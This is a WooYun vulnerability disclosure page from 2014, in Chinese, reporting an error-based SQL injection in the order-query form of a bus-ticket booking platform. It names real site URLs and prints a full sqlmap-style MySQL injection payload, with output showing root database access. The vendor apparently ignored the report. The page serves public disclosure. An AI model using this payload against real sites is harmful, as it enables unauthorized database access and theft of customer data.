当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058560

漏洞标题:某通用型汽车网上售票平台POST注射(root权限)

相关厂商:远征电子科技开发有限公司

漏洞作者: 路人甲

提交时间:2014-04-29 10:53

修复时间:2014-06-13 10:54

公开时间:2014-06-13 10:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某通用型汽车网上售票平台SQL注射(root权限)

详细说明:

地址:http://www.365tkt.com/
涉及站点如下:

1.jpg


2.jpg


以济宁汽车总站为例
地址:http://www.365tkt.com/jnzz/
订单查询处,输入如下

3.jpg


报错

4.jpg


判断存在post注入
Place: (custom) POST
Parameter: #2*
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: eport='and(select 1 from(select count(*),concat((select concat(CHAR
(52),CHAR(67),CHAR(117),CHAR(79),CHAR(78),CHAR(104),CHAR(75),CHAR(100),CHAR(117)
,CHAR(110),CHAR(55)) from information_schema.tables limit 0,1),floor(rand(0)) AN
D (SELECT 5664 FROM(SELECT COUNT(*),CONCAT(0x3a61736e3a,(SELECT (CASE WHEN (5664
=5664) THEN 1 ELSE 0 END)),0x3a7a7a713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHE
MA.CHARACTER_SETS GROUP BY x)a) AND (6182=61822))x from information_schema.table
s group by x)a)and'
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0
root权限
current user: 'root@localhost'
http://www.365tkt.com/tjxz/
http://www.365tkt.com/ytzz/
http://www.365tkt.com/dyzz/
站点很多,就不一一列举了

漏洞证明:

见上

修复方案:

Null

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝